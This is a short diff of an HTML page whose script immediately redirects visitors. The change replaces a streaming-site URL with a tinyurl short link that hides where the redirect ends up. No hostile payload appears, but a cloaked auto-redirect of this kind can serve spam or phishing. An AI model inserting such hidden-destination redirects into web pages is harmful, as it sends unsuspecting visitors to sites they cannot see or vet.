--- a/promote.html
+++ b/promote.html
@@ -8,7 +8,7 @@
 <script>
     const urlParams = new URLSearchParams(window.location.search);
     const customId = urlParams.get('id');
-    const newUrl = ` https://www.watchdragonball.net/category/dragon-ball-daima-english-subbed/ `;
+    const newUrl = ` https://tinyurl.com/sha256onlinecom `;
     window.location.replace(newUrl);
 </script>
 </body>
